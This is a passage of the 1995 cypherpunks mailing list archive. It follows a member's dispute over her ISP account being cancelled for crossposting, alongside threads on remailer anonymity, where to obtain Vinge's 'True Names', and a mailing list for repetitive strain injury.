It's amazing how much just knowing your sysop's first name helps in such a 
situation.

As for MCs, I am not sure of their policies but Karl is very reliable, 
and I doubt he would be so reactionary, in any case, I'll contact him 
about such policies.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 6 Jan 95 09:47:43 PST
To: cypherpunks@toad.com
Subject: TRUE NAMES FOR FREE
Message-ID: <199501061748.JAA12677@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Angus Patterson wrote a short while ago:

S6>I've been trying to get True Names by Vernor Vinge, and have been told it's
  >out of print (like most good cypunk ), does anybody have it scanned?

Laissez Faire Books has a stockpile and they're giving them away!
LF sends you _True_Names_ free when you buy _Solomon's Knife_ by Victor
Korman (a pen-name). Order FN5136, $9.95 for both + $3.25 shipping:
Laissez Faire, 938 Howard Street #202, San Francisco, CA 94103, tel
800-326-0996, fax 415-541-0597. They have their own Laissez Faire Book
News list, too, with previews and samples. Ask Chris Whitten for more
info at <whitten@panix.com>.

"Capt'n Bob"


Correspondents:  Communications went down recently when 2 remailers
shut up shop. A new address will be up and running during next week.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 08:18:03 PST
To: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
Subject: Re: Sorehand mailing list
In-Reply-To: <Pine.3.89.9501061018.A576733809-0100000@umiami.ir.miami.edu>
Message-ID: <Pine.3.89.9501061030.B13186-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes, Michael I might get SOREHAND having to rewrite all my HTML code.
Thanks for the great tip. An ounce of prevention is worth a pound of cure.

Love Always,

Carol Anne
ps and here's the SOREHAND M/L address in case you trashed it.
 
On Fri, 6 Jan 1995, Michael Froomkin wrote:

> While I was abroad, someone from this list asked me for the address 
> for the SOREHAND mailing list, which helps those suffering from 
> repetitive strain injuries (RSI), including carpal tunnel syndrome.
> I didn't have the listserve info in England, and somehow lost the request 
> before I got back.
> 
> Figuring, however, that cypherpunks write code, that writing code causes
> RSI, and hence this address might be of more general interest, here it is: 
> 
> to subscribe, send a SUBSCRIBE SOREHAND <yourname> to 
> 
> Listserve@ucsfvm.ucsf.edu
> 
> A.Michael Froomkin          | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> U.Miami Law School          | MFROOMKI@UMIAMI.IR.MIAMI.EDU
> PO Box 248087               | 
> Coral Gables, FL 33146 USA  | It's warmish here, almost cool.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <MFROOMKI@umiami.ir.miami.edu>
Date: Fri, 6 Jan 95 07:35:46 PST
To: cypherpunks@toad.com
Subject: Sorehand mailing list
Message-ID: <Pine.3.89.9501061018.A576733809-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


While I was abroad, someone from this list asked me for the address 
for the SOREHAND mailing list, which helps those suffering from 
repetitive strain injuries (RSI), including carpal tunnel syndrome.
I didn't have the listserve info in England, and somehow lost the request 
before I got back.

Figuring, however, that cypherpunks write code, that writing code causes
RSI, and hence this address might be of more general interest, here it is: 

to subscribe, send a SUBSCRIBE SOREHAND <yourname> to 

Listserve@ucsfvm.ucsf.edu

A.Michael Froomkin          | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
U.Miami Law School          | MFROOMKI@UMIAMI.IR.MIAMI.EDU
PO Box 248087               | 
Coral Gables, FL 33146 USA  | It's warmish here, almost cool.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 08:43:15 PST
To: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Subject: Re: Chain letter bounced (fwd)
In-Reply-To: <199501061011.FAA23248@bb.hks.net>
Message-ID: <Pine.3.89.9501061049.A13233-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks for the great article....I chuckled a lot, and I haven't had a
lot to chuckle about these days.....

But I still think that as the computer program we trust the most, he deserves
overt support in all phases of my life. Even though I am dead broke, I 
could tell my main newsgroups. I wasn't asking or telling. Just informing.
And it was to .1% of all Usenet ....That...is...not...a...lot!

I am sure the real point of your post will 
come through, but for now I'm kinda clueless.

Love always,

Carol Anne

On Fri, 6 Jan 1995, L. McCarthy wrote:
> [...]
> > To: cypherpunks@toad.com
> > From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
> [...]
> > Posting letters asking for $$$ is of course a risky venture on Usenet. We
> > see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the
> > MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out
> [...]
> 
>  -L. Futplex McCarthy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 09:26:14 PST
To: "david d `zoo' zuhn" <zoo@armadillo.com>
Subject: Re: Chain letter bounced (fwd)
In-Reply-To: <199501061705.LAA04565@monad.armadillo.com>
Message-ID: <Pine.3.89.9501061141.C13233-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Inasmuch as I sent the prior posting the way I did, (as I can only read one
letter at a time), You do not speak for all the cypherpunks, neither do I.
On the time chronology you are the first to complain about the account
closing notice. That doesn't constitute a WE yet.

So please do not send me further personal mail.

I'm glad I'm not so clueless about Stalking Laws in the State of Minnesota.

Now I've go to my free.org account and get my Star-Trib address archive back.

Carol Anne Braddock
signed 1/6/95 11:25 A.M.

On Fri, 6 Jan 1995, david d `zoo' zuhn wrote:

> //  come through, but for now I'm kinda clueless.
> 
> Very very true.
> 
> And please stop including this stuff at the end of every message.  WE DON'T
> CARE.
> 
> 
> //  From carolann@vortex.mm.com Fri Jan  6 01:39:29 1995
> //  Date: Thu, 5 Jan 1995 21:57:05 -0600
> //  From: Carol Anne Braddock <carolann@vortex.mm.com>
> //  To: carolann@vortex.mm.com
> //  
> //  [icicle.winternet.com] 
> //  Login name: carolann  			In real life: CarolAnne Braddock
> //  Directory: /usr2/carolann           	Shell: /etc/scripts/tcsh-susp
> //  Last login Thu Jan  5 21:38 on ttyq5 from annex3-1.wintern
> //  New mail received Thu Jan  5 21:16:23 1995;
> //    unread since Mon Jan  2 13:18:25 1995
> //  Plan:
> //  This account has been disabled permanently.
> //  
> //  Mike Horwath - Admin - Winternet - drechsau@winternet.com
> //  
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 09:39:26 PST
To: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Subject: Re: All I did was properly crosspost!
In-Reply-To: <Pine.3.89.9501060852.B2432-0100000@nesta.pr.mcs.net>
Message-ID: <Pine.3.89.9501061141.B13486-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Nesta Stubbs wrote:
> On Fri, 6 Jan 1995, Carol Anne Braddock wrote:
> Ten is not a large number when it comes to cross-posting on some topics, I 
> can think of at least twenty newsgroups where the PRZ letters and such 
> would make a lot of sense and be on topic.  This just goes to show the 
> sometimes reactionary steps people take to control spamming.  It leads to 
> people getting hurt, especially when the sysop at your site is not 
> intelligent enough to look at the article, and see whether or not it was 
> cross-posted to valid groups etc..and not only that, but to completely 
> pull your account for such a small thing (ten groups?  that's nothing in 
> comparison to some articles out there still going). What is the name of the 
> sysop at that site your account was pulled from?  
>  
His name is Michael Horwath, root@winternet.com

> > But to take my account away for crossposting to 10 groups is not right.
> >
> I agree, ten groups is a small amount, especially if they are at least 
> marginally on topic.  
> 
> This is something that we need to watch out for tho, it makes people 
> fearful of spreading information, when even if you spread it in a nice 
> manner, to on-topic groups etc.. that you face the chance of some bozo 
> net-vigilante complaining to your sysop and having your account yanked. 
> From the evidence here it seems the sysop acted in a reactionary manner, 
> probably out of fear of some asshole mailbombing your account.  
> 
> I heartily recommend that those of you who do not know your site's 
> policies for such, become acquainted with them, or at least contact the 
> sysop and talk about this issue.  If you contact him and talk to him(her) 
> about it then they are less likely to react so quickly and IMO stupidly.  
> It's amazing how much just knowing your sysops first name helps in such a 
> situation.
> 
> As for MCs, I am not sure of their policies but Karl is very reliable, 
> and I doubt he would be so reactionary, in any case, I'll contact him 
> about such policies.
>  
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 09:46:03 PST
To: "david d `zoo' zuhn" <zoo@armadillo.com>
Subject: Re: All I did was properly crosspost! harrassments another story
In-Reply-To: <199501061733.LAA04744@monad.armadillo.com>
Message-ID: <Pine.3.89.9501061158.C13486-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, david d `zoo' zuhn wrote:

> Sorry, but I don't flame in public fora.  I do so in email only.
> 
> The Michigan precedent for email stalking isn't very strong (it also
> included several incidents of physical contact as well), so your threats are
> not really too worrisome.  The last time I checked with various folks about
> the Minnesota laws, it's not exactly too clear on email (prosecution in the
> situation in question was declined due to lack of confidence in
> conviction), so again, I'm not very worried.
> 
> But it doesn't matter since you've just entered my global kill files.
> Anything you send to me won't be seen at all.  Anywhere.  Anyhow.  News.
> Mail.  Etc.  Plonk!
> 
> And as a personal note, if your concept of 'dealing' involves making legal
> threats at the first possible instance of disagreement, then I think you
> need a new concept of 'dealing'.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher E Stefan <flatline@u.washington.edu>
Date: Fri, 6 Jan 95 11:55:22 PST
To: Angus Patterson <s675570@aix1.uottawa.ca>
Subject: Re: True Names
In-Reply-To: <Pine.3.89.9501051627.A53015-0100000@aix1.uottawa.ca>
Message-ID: <Pine.A32.3.91c.950106115328.50074E-100000@mead2.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Jan 1995, Angus Patterson wrote:

> I've been trying to get True Names by Vernor Vinge, and have been told it's
> out of print (like most good cypunk ), does anybody have it scanned? 
> I realize this is without permission, so does anybody have Vinge's address?
> (e-mail or otherwise) or could anybody ask him? Btw, does he have any other
> crypto/anonymity related stories? Thanks in advance.

I saw a copy of _True Names_ in a local bookstore recently, so if you 
check around you may be able to find it.  You may also want to check the 
used bookstores in your area.

Good luck!
-- 
Christopher E Stefan  *  flatline@u.washington.edu  *  PGP 2.6ui key by request





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@python.ee.unr.edu>
Date: Fri, 6 Jan 95 08:51:10 PST
To: cypherpunks@toad.com
Subject: Remailer anonymity
Message-ID: <199501061656.LAA26109@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Much has been said lately about maintaining anonymity for remailer
users while providing some "pay to play" mechanism for the operator.
Absent strong collusion between operators, doesn't remailer chaining
ensure anonymity? Plenty of movie "bad guys" escape by getting on the
subway because no one knows where they'll get off or change lines.
It seems to me that knowing a person entered the system is far less
information than knowing where they exited. As long as remailers have
guaranteed access to other remailers, anonymity should be maintained. 

Re: collusion; I'd sooner believe the Macro$oft/RCC fable.
In a gadda da vida, Billy.

=D.C. Williams	<dcwill@ee.unr.edu>

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw12MioZzwIn1bdtAQH+XQF/RGe9sufCmL8KB2ARuyJNChmF+ZA4DRlf
cCnAwpyUhRRtWdpDRx7wZxopjvPHUYDC
=kVwM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 10:03:17 PST
To: Alex de Joode <usura@replay.com>
Subject: Re: Your HomePage at winternet.com
In-Reply-To: <199501061739.AA29180@xs1.xs4all.nl>
Message-ID: <Pine.3.89.9501061234.E13486-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Alex, 

We have all the web pages. They should be moving to spring.com shortly.

It's kinda sad that they bootleg off my net.web.goodwill, as My pages are
at the 200+ access count and rising level per day. The Webbittown pages
will remedy this in the not too distant future. (PGP encoded HTML)

They should be down by the end of the day.

Love Always,

Carol Anne

> -- 
> Alex de Joode					    
> usura@replay.com	                               Hate mail appreciated,
> http://www.xs4all.nl/~usura             weekly contest for best death threat.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 10:14:39 PST
To: cypherpunks@toad.com
Subject: Guess what I just got In the mail? giggle..giggle
Message-ID: <Pine.3.89.9501061235.G13486-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Fri, 6 Jan 95 18:57:36 +0200
From: daemon@anon.penet.fi
To: carolann@mm.com
Subject: Chain letter bounced

You, carolann@mm.com, have sent a message that seems to contain yet another
copy of the infamous Make Money Fast chain letter.

If you want to make a complaint, please send just the headers of the
message to admin@anon.penet.fi - albeit as the messages have been blocked
(as you can see), the message probably *didn't* go through anon.penet.fi
but was faked (using NNTP faking or something similar).

If you are trying to *post* the chain letter, please read the following:

By now you should know that the net doesn't find all the waste of
networking resources, time and money this stupid and illegal scam
has caused amusing at all.

I have actually been forced to incorporate an automatic chain letter
detector / bouncer just for this... 

Here is the appropriate FAQ:

 - - - - - - - - - - - - - - - - - - -

This FAQ is for the benefit of those who have never experienced the
advertisement MAKE.MONEY.FAST.  Here are some answers to some questions
frequently asked.
 
1. Does MAKE.MONEY.FAST really work?
 
   Not in the sense that you'll make money fast, but you'll make a
   lot of enemies fast.
 
2. If I forward or repost MAKE.MONEY.FAST, will I get a lot of mail?
 
   Yes, hate mail, flames, etc.
 
3. How can I get my account cancelled?
 
   Post MAKE.MONEY.FAST.
 
4. How can I get my system administrator mad at me?
 
   Post MAKE.MONEY.FAST.  His mailbox will be so full of complaints,
   it'll take him/her a week to sort through all of them.
 
5. Who is Dave Rhodes?
 
   Salmon Rushdie's roommate.  Just about every administrator wants to
   kill him so he had to go in hiding.
 
6. How can I assure I have a long and prosperous life?
 
   Well, nobody can guarantee that, but it can be guaranteed that if
   you post MAKE.MONEY.FAST your life may be cut short by accident
   (hee hee).
 
7. Just how does one have to never work again after posting MAKE.MONEY.FAST?
 
   Well, MAKE.MONEY.FAST is a Ponzi scheme.  Ponzi schemes are illegal.
   Ponzi schemes are a form of fraud.  Some of these net interchanges
   go over telephone wires, optic fibers, and microwave transmissions all
   regulated by the FCC.  If you repost MAKE.MONEY.FAST over the net, and
   someone at the FCC wanted to get nasty, they may want to prosecute you
   for WIRE fraud.
 
   Once you're in jail, you never have to pay rent, your meals are free.
   Anal injections are free.  MAKE.MONEY.FAST has a lot of side benefits.
 
8. How can I help to stop the spread of MAKE.MONEY.FAST?
 
   When some netter newbie blunders and posts MAKE.MONEY.FAST on the net,
   just send him a polite letter to not do it again (remember, the newbies
   act out of ignorance) then write the root@domain and request they inform
   all their users not to perpetuate this drivel.

 - - - - - - - - - - - - - - - - - - -
 
Contents of message follows:

X-Envelope-To: na166182
Received: by anon.penet.fi (5.67/1.35)
	id AA19254; Fri, 6 Jan 95 18:50:45 +0200
Received: from relay2.uu.net(192.48.96.7) by anon.penet.fi via anonsmtp (V1.3mjr)
	id sma017754; Fri Jan  6 18:47:54 1995
Received: from toad.com by relay2.UU.NET with SMTP 
	id QQxxnn06516; Fri, 6 Jan 1995 11:50:16 -0500
Received: by toad.com id AA06017; Fri, 6 Jan 95 08:43:15 PST
Received: from vortex.mm.com ([204.73.34.1]) by toad.com id AA05996; Fri, 6 Jan 95 08:42:58 PST
Received: from downburst.mm.com (carolann@downburst.mm.com [204.73.34.2]) by vortex.mm.com (8.6.9/8.6.6) with ESMTP id KAA28027; Fri, 6 Jan 1995 10:48:27 -0600
Received: (carolann@localhost) by downburst.mm.com (8.6.9/8.6.6) id KAA13250; Fri, 6 Jan 1995 10:48:16 -0600
Date: Fri, 6 Jan 1995 10:48:16 -0600 (CST)
From: Carol Anne Braddock  <carolann@mm.com>
Subject: Re: Chain letter bounced (fwd)
To: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Cc: cypherpunks@toad.com
In-Reply-To: <199501061011.FAA23248@bb.hks.net>
Message-Id: <Pine.3.89.9501061049.A13233-0100000@downburst.mm.com>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-cypherpunks@toad.com
Precedence: bulk

Thanks for the great article....I chuckled a lot, and I haven't had a
lot to chuckle about these days.....

But I still think that as the computer program we trust the most, he deserves
overt support in all phases of my life. Even though I am dead broke, I 
could tell my main newsgroups. I wasn't asking or telling. Just informing.
And it was to .1% of all Usenet ....That...is...not...a...lot!

I am sure the real point of your post will 
come through, but for now I'm kinda clueless.

Love always,

Carol Anne

On Fri, 6 Jan 1995, L. McCarthy wrote:
> [...]
> > To: cypherpunks@toad.com
> > From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
> [...]
> > Posting letters asking for $$$ is of course a risky venture on Usenet. We
> > see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the
> > MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out
> [...]
> 
>  -L. Futplex McCarthy

>From carolann@vortex.mm.com Fri Jan  6 01:39:29 1995
Date: Thu, 5 Jan 1995 21:57:05 -0600
From: Carol Anne Braddock <carolann@vortex.mm.com>
To: carolann@vortex.mm.com

[icicle.winternet.com] 
Login name: carolann  			In real life: CarolAnne Braddock
Directory: /usr2/carolann           	Shell: /etc/scripts/tcsh-susp
Last login Thu Jan  5 21:38 on ttyq5 from annex3-1.wintern
New mail received Thu Jan  5 21:16:23 1995;
  unread since Mon Jan  2 13:18:25 1995
Plan:
This account has been disabled permanently.

Mike Horwath - Admin - Winternet - drechsau@winternet.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 10:57:46 PST
To: Niall Murphy <niallm@avernus.internet-eireann.ie>
Subject: Re: your mail
In-Reply-To: <20014f17.39f3-niallm@avernus.internet-eireann.ie>
Message-ID: <Pine.3.89.9501061227.A13609-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain


Is that better...giggle...

Hope you make and hand out some hard copies!

Love Always,

Carol Anne
ps if it was you instead of Zimmy the result
would have been the same, I think.

I'll rant why I'm actually on the list soon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 11:03:12 PST
To: cypherpunks@toad.com
Subject: There.....Do ya like this one better?
Message-ID: <Pine.3.89.9501061338.A13661-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain




Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List. 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 11:24:21 PST
To: anonymous-remailer@shell.portal.com
Subject: Re: SysAdmin of the year
In-Reply-To: <199501061846.NAA26994@bb.hks.net>
Message-ID: <Pine.3.89.9501061347.C13661-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Aren't ya glad 94's over with?
He was in a big hole as 95 started.

His machine was being hacked routinely.
Nobody on the Web visited the site.

I just like PGP.
I believe it to be the nicest program anywhere.
It has lots of everyday uses, even you used it.

And when I crosspost a help note to .1% of Usenet,
and lose 4 days of good postings, everyone loses.

Till of course the story is told, for all to know.

Love Always,

Carol Anne

Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM

On Fri, 6 Jan 1995 anonymous-remailer@shell.portal.com wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> 
> > > According to Carol Anne Braddock: 
> 
> > His name is Michael Horwath, root@winternet.com
>               ^^^^^^^^^^^^^^^
> 
> > [icicle.winternet.com] 
> > Login name: carolann  			In real life: CarolAnne Braddock
> > Directory: /usr2/carolann           	Shell: /etc/scripts/tcsh-susp
> > Last login Thu Jan  5 21:38 on ttyq5 from annex3-1.wintern
> > New mail received Thu Jan  5 21:16:23 1995;
> >   unread since Mon Jan  2 13:18:25 1995
> > Plan:
> > This account has been disabled permanently.
> 
> 
> - ---
> [This message has been signed by an auto-signing service.  A valid signature
> means only that it has been received at the address corresponding to the
> signature and forwarded.]
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> Comment: Gratis auto-signing service
> 
> iQBFAwUBLw2PxioZzwIn1bdtAQEgggF+ImxhTJlTtuMMJglmt3z/EriU0W2KisJZ
> kr+JZeyf2iPyi5O/xsoHNWR/jHaYtE34
> =wNlp
> -----END PGP SIGNATURE-----
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dwomack@runner.utsa.edu (Dave)
Date: Fri, 6 Jan 95 11:35:16 PST
To: cypherpunks@toad.com
Subject: Carol Anne - C'Punk Poster Person?
Message-ID: <9501061935.AA14193@runner.utsa.edu>
MIME-Version: 1.0
Content-Type: text/plain


It occurs to me that Carol's problem may well be of
considerable interest to c'punks and free speechers
everywhere.  Not that I favor spam or its derivatives -
but Cancelmoose and others define spam as *_50_* or
more groups, esp. without crossposting.

My basis for saying that Carol's situation is
of interest is ---- as the net becomes more vulnerable
to regulation, who among us is immune to a quick
cancellation of account?  For something such as,
say, the irresponsible (and antisocial?) advocacy
of crypto?  If an account can be chopped for 10
posts, where is the bottom limit?  5 perhaps? 2 maybe?
1 post that the sys-admin disagrees with?

Developing the idea, and combining it with for-profit
remailers...what would be wrong with a provider offering
a unix shell based account, with the option of registering
the account under a nym - and with finger user switchable
from on to off and back again?  The login ID would also
be unconnected to the name.  Frankly, none of this seems
that radical...our friend, America On Line has some of
these characteristics!  Various  'anti-true spam'
strategies could be used to prevent massive postings
of Make Money Etc...But instead of a remailer, an
actual *_system_* would be used.  Payments could be
by electronic invoice and money orders...

Any thoughts on this?

Dave



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 6 Jan 95 10:40:21 PST
To: cypherpunks@toad.com
Subject: SysAdmin of the year
Message-ID: <199501061846.NAA26994@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> > According to Carol Anne Braddock: 

> His name is Michael Horwath, root@winternet.com
              ^^^^^^^^^^^^^^^

> [icicle.winternet.com] 
> Login name: carolann  			In real life: CarolAnne Braddock
> Directory: /usr2/carolann           	Shell: /etc/scripts/tcsh-susp
> Last login Thu Jan  5 21:38 on ttyq5 from annex3-1.wintern
> New mail received Thu Jan  5 21:16:23 1995;
>   unread since Mon Jan  2 13:18:25 1995
> Plan:
> This account has been disabled permanently.


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw2PxioZzwIn1bdtAQEgggF+ImxhTJlTtuMMJglmt3z/EriU0W2KisJZ
kr+JZeyf2iPyi5O/xsoHNWR/jHaYtE34
=wNlp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock <carolann@mm.com>
Date: Fri, 6 Jan 95 11:43:17 PST
To: Mike Horwath <drechsau@winternet.com>
Subject: Re: Files and mail
In-Reply-To: <m0rQCCt-000Sx3C@icicle.winternet.com>
Message-ID: <Pine.3.89.9501060725.A12518-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Mr. Horwath,

A written reply will suffice.
You have my permission to make all of my files world readable.
You can put them in the ftp site.

Upon receipt of notice, they will be removed within 24 hours,
and you will receive a signed PGP statement with the new key,
stating that the files have been removed. Other Winternet users have
already gone to my defense, and copied all of the world readable
material anyway. And the whole account might as well be, too.

Please do not forward any mail here. You will better serve yourself 
bouncing the letter back to the sender and informing them of my new
address. If I find forwarded mail in my mailbox, I will print hard
copies and visit the Attorney General's Office and file a complaint
under the Stalking laws of the State of Minnesota.

And please...deactivate my WWW pages. I was astounded to find out
that during the suspension, they continued to remain active, as I
learned in the office Wednesday. That was (and still is) stealing my 
net.web.goodwill, and creating a falsehood amongst other users.

My WWW Pages have found a nice, new, warm sunny home in Austin, Texas.

I spent six full hours making a personal appearance, at great 
personal expense, to the Winternet Office to resolve the situation.

My original reply still sits in suspended composition in my mailer. I 
wasted not a nano-second in preparing my reply to the posting. In legal
point of fact, the poster is in violation of Minnesota State Law. He has
no legal jurisdiction whatsoever.

I did not take days to "investigate", nor cite that other things such as
"my machines being hacked" and "I'll do it when I'm ready to do it,".

It was a simple complaint. It had no validity. Crossposting an article to
.1% of the Usenet News Groups does not by the very statistic constitute 
spam. (And I own two shares of Hormel Corp, so I do know what SPAM (tm) is.)

As was pointed out in alt.current-affairs.net-abuse
The complainer didn't fully read said article. It was timely.(and still is)
The crossposting wasn't wasting resources.
It is of no one's concern the actual groups posted. 
They have the right and ability to respond.
I asked for no money. I did not stand to profit by the posting.
The person who started the whole thing was pretty heavily chastised,
by the readers of his own news group.

A fast "K" was all that any individual needed for this article.

No, Mr. Horwath, you are "way out-of-bounds" this time.
And as the time chronology unveils itself, I am sure that 
will be shown to be a very truthful, factual statement.

Dangerous precedents were set here. I will not rest until the 
whole of the Internet knows and is aware of the situation.

Signed
Carol Anne Braddock
Friday January 6th, 1995 9:40 A.M.

On Fri, 6 Jan 1995, Mike Horwath wrote:

> You are welcome to your files and mail, I will pack everything up for
> you as you left it, including your FTP area.
> 
> I expect you to try to reach me today in the afternoon at my office and
> I will fully explain why your account was deleted, with full detail as
> to why.
> 
> I do appreciate the work you did on the shirts for Winternet.  I don't
> appreciate the harassment you have already tried to bring upon me.
> 
> When we talk, I think you might understand why this was done.  If you do
> not, then I feel bad, as I must then not be making myself clear.  But
> no matter what, this was policy that you chose to break even after I 
> had talked to you about it.  More on this when we talk.
> 
> Good luck at your new provider, Larry Leone is an old user of mine and
> seems to be a good guy, even if a little quiet on the newsgroups :)
> 
> A copy of this letter is also going to your new admin so that he knows
> what is going on.
> 
> Larry, Carol Anne was using about 11.5MB of disk that will be moving
> over from Winternet to MM.
> 
> Also, how have you been anyway?  Been awhile since I saw you.  Oh, and
> could you install identd on your system?  Get back to me on anything,
> or with questions.
> 
> -- 
> Mike Horwath    IRC: Drechsau    LIFE: Lover     drechsau@winternet.com
> Winternet:  info@winternet.com              root@jacobs.mn.org <- Linux!
> Twin Cities area Internet Access:  612-941-9177 for more info
> Founding member of Minnesota Coalition for Internet Accessibility
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Fri, 6 Jan 95 13:51:51 PST
To: dwomack@runner.utsa.edu
Subject: RE: Carol Anne - C'Punk Poster Person?
Message-ID: <9501062152.AA05672@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Dave  <dwomack@runner.utsa.edu>

It occurs to me that Carol's problem may well be of
considerable interest to c'punks and free speechers
everywhere.  Not that I favor spam or its derivatives -
but Cancelmoose and others define spam as *_50_* or
more groups, esp. without crossposting.
...........................................................

It occurs to me that Carol's problem is personal, that we don't know 
all of the details, that the sysadmin responsible is in contact with 
her and appears quite willing to communicate on the episode, to explain 
to her the reason for the action taken as well as being willing to 
provide to her opportunity to retrieve all of her email, etc. as well 
as to talk to her new provider and explain once again the details of 
the situation.

If the sysadmin's action was the result of regulation, then it would be 
apropos for a wider range of interest, but it appears to be the 
decision of an individual sysadmin acting on his own prerogative.   
Objections could be sent to him personally, unless someone wanted to 
make him answer to the list for his judgement and decision, and spend a 
lot of time arguing with him about it.

Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 6 Jan 95 11:19:04 PST
To: nsb@nsb.fv.com (Nathaniel Borenstein)
Subject: Re: Remailer Abuse
In-Reply-To: <Aj3HRaf0Eyt5ExIApP@nsb.fv.com>
Message-ID: <199501061911.OAA08861@bwnmr5.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


nsb wrote:

| Excerpts from mail: 5-Jan-95 Re: Remailer Abuse db@Tadpole.COM (1180*)

| > Heh. An anonymous remailer paid for by credit card... there'd
| > have to be an additional level of indirection for it to work,

| Again, this comes down to definitions of anonymity.  In this case, if
 [...]
| two different countries.  For my part, I figure that if the government
| of Finland and the government of the US can actually agree that it's so
| important to force the sacrifice of anonymity in a given case that
| they're both willing to coerce companies under their jurisdiction, they
| will probably have a very good reason for doing so.   Maybe I'm too
| trusting, though.)

	It's also a matter of analysing your threats.  There may be
employees of one or more companies involved who might sell
information.  Then again, if you're selling plans of the B2 to the
Iraqis, the US & Norwegian governments might collude to track you
down, (and in the process, read a lot of other messages.)

| Excerpts from mail: 5-Jan-95 Re: Remailer Abuse wcs@anchor.ho.att.com (2028)

| > Beyond that, though, are some traffic analysis problems -
| > remailers require a fair bit of traffic to be useful, and unless
| > you receive a reasonable amount of encrypted traffic, 
| > and support encrypted email for purchasing remailer service
